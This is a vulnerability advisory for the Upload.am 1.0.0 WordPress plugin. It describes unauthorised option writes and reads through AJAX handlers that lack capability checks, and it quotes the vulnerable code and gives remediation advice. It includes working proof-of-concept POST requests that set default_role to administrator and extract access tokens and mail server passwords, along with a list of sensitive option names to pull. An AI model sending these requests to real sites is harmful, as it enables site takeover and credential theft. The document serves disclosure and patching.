# Exploit Title: Upload.am 1.0.0 WordPress Plugin - Multiple Vulnerabilities
# Date: Aug 12, 2025
# Exploit Author: bRpsd cy[at]live.no
# Vendor Homepage: https://wordpress.org/plugins/upload-am-file-hosting-vpn/
# Version: <= 1.0.0
# Tested on: MacOS, localhost xampp
# Authentication required: Low privilege

Critical: Unauthorized Settings Modification (CWE-862)
CVE-ID: N/A
CVSS: 8.1 (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H)
Affected File: upload-am-file-hosting-vpn.php:283-291

Vulnerable Code:
283: add_action('wp_ajax_upload_am_update_option', function () {
284:     check_ajax_referer('upload_am_nonce', 'nonce');
285:     if (!isset($_POST['option_name']) || !isset($_POST['option_value'])) {
286:         wp_send_json_error(['message' => 'Missing required parameters']);
287:     }
288:     $option_name = sanitize_text_field(wp_unslash($_POST['option_name']));
289:     $option_value = sanitize_text_field(wp_unslash($_POST['option_value']));
290:     update_option($option_name, $option_value);
291:     wp_send_json_success(['message' => 'Option updated']);

Input Source:
Parameter: $_POST['option_name'] and $_POST['option_value']
Flow: User input -> sanitize_text_field() -> update_option() with no capability check

Note: check_ajax_referer() only validates the CSRF nonce; it does not verify the caller's capabilities, and a wp_ajax_ hook is reachable by any logged-in user. sanitize_text_field() strips markup but does not restrict which option is written, so a low-privileged account that holds a valid nonce can set any option name to any value. Remediation: before update_option(), require current_user_can('manage_options') and restrict option_name to an allow-list of the plugin's own options (e.g. the upload_am_ prefixed settings).

Impact: Complete WordPress configuration control allowing:
Privilege escalation (setting default_role to administrator)
Site takeover (modifying admin_email, siteurl)
Security bypass (disabling security plugins via active_plugins option)
Malicious redirections and content injection

POC:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_logged_in_xxx=value

action=upload_am_update_option&option_name=default_role&option_value=administrator&nonce=VALID_NONCE_HERE

============================================================================================================

High: Sensitive Information Disclosure (CWE-200)
CVSS: 6.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
Affected File: upload-am-file-hosting-vpn.php:275-281

Vulnerable
Code:
275: add_action('wp_ajax_upload_am_get_option', function () {
276:     check_ajax_referer('upload_am_nonce', 'nonce');
277:     if (!isset($_POST['option_name'])) {
278:         wp_send_json_error(['message' => 'Missing option_name']);
279:     }
280:     $option_name = sanitize_text_field(wp_unslash($_POST['option_name']));
281:     $value = get_option($option_name);
282:     wp_send_json_success($value);

Parameter: $_POST['option_name']
Flow: User input -> sanitize_text_field() -> get_option() -> JSON response

Note: as in the update handler, the nonce check is CSRF protection only; no current_user_can() check guards get_option(), and the option value is returned verbatim through wp_send_json_success(), so any logged-in user holding a valid nonce can read any option, including stored credentials. Remediation: add a current_user_can('manage_options') check and an allow-list of readable plugin options, and never return secrets such as mailserver_pass or the access/refresh tokens through this endpoint.

POC:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_logged_in_xxx=value

action=upload_am_get_option&option_name=upload_am_access_token&nonce=VALID_NONCE_HERE

Additional sensitive options that can be extracted:
option_name=mailserver_login
option_name=mailserver_pass

# Site configuration
option_name=admin_email
option_name=users_can_register
option_name=active_plugins
option_name=siteurl
option_name=home

# Authentication tokens
option_name=upload_am_access_token
option_name=upload_am_refresh_token

Impact: Exposure of sensitive WordPress configuration including:
API tokens and credentials
Plugin/theme configuration
Administrative email addresses
Site URLs and security settings